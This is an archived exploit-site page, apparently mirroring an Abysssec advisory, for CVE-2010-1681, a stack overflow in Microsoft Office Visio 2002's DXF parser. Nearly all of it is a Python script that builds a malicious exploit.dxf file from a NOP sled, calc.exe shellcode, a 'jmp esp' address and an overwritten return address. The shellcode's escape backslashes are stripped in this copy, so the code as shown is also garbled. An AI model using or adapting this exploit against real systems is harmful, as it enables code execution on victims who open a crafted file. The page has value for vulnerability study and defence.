Microsoft Office Visio DXF File Stack based Overflow
Posted on 08 September 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Microsoft Office Visio DXF File Stack based Overflow</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================== Microsoft Office Visio DXF File Stack based Overflow ==================================================== Title : Microsoft Office Visio DXF File Stack based Overflow Version : Microsoft Office Visio 2002(xp) Analysis : http://www.abysssec.com Vendor : http://www.microsoft.com Impact : Ciritial Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-1681 ''' # Tested on Microsoft Office Visio 2002 (xp) in Windows XP SP3 import sys def main(): try: fdR = open('src.dxf', 'rb+') strTotal = fdR.read() str1 = strTotal[:100] str2 = strTotal[1020:1124] str3 = strTotal[1128:1169] str4 = strTotal[1173:] eip = "x66x28xC9x61" # leave popad ret jmp = "x64x64xdbx30" # jmp esp # Modified Alphanumbric calc.exe shellcode shellcode = 'x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90xebx00xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49x49x49x48x49x49x49x49x49x49x49x49x49x51x5ax6ax44x58x50x30x41x30x41x6bx41x41x54x42x32x41x42x32x42x41x30x42x41x58x41x50x38x41x42x75x4ax49x69x6cx4bx58x51x54x65x50x57x70x45x50x4ex6bx67x35x35x6cx4ex6bx73x4cx55x55x71x68x67x71x68x6fx6cx4bx52x6fx46x78x4ex6bx51x4fx71x30x74x41x7ax4bx30x49x6cx4bx54x74x6ex6bx76x61x4ax4ex35x61x4bx70x6ax39x4cx6cx4dx54x6bx70x30x74x54x47x6ax61x6ax6ax64x4dx63x31x79x52x4ax4bx69x64x67x4bx32x74x65x74x66x64x31x65x4ax45x6cx4bx71x4fx31x34x57x71x48x6bx52x46x6ex6bx64x4cx52x6bx4ex6bx31x4fx77x6cx54x41x68x6bx4cx4bx57x6cx6cx4bx57x71x4ax4bx4ex69x41x4cx65x74x67x74x4ax63x75x61x4fx30x51x74x6cx4bx61x50x50x30x4fx75x4fx30x32x58x64x4cx4cx4bx71x50x54x4cx4cx4bx70x70x57x6cx4ex4dx6ex6bx73x58x35x58x4ax4bx36x69x6cx4bx4dx50x4cx70x67x70x75x50x37x70x4cx4bx45x38x35x6cx41x4fx57x41x68x76x53x50x30x56x6ex69x6bx48x6fx73x6fx30x63x4bx62x70x30x68x58x70x6fx7ax57x74x51x4fx45x38x6fx68x59x6ex4fx7ax66x6ex62x77x69x6fx38x67x73x53x52x41x30x6cx71x73x64x6ex35x35x30x78x70x65x45x50x44' if len(shellcode) > 920: print "[*] Error : Shellcode is too long !" return if len(shellcode) <= 920: dif = 920 - len(shellcode) while dif > 0 : shellcode += 'x90' dif = dif - 1 fdW= open('exploit.dxf', 'wb+') fdW.write(str1) fdW.write(shellcode) fdW.write(str2) fdW.write(jmp) fdW.write(str3) fdW.write(eip) fdW.write(str4) fdW.close() fdR.close() print '[-] DXF file generated' except IOError: print '[*] Error : An IO error has occurred' print '[-] Exiting ...' sys.exit(-1) if __name__ == '__main__': main() # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-08]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
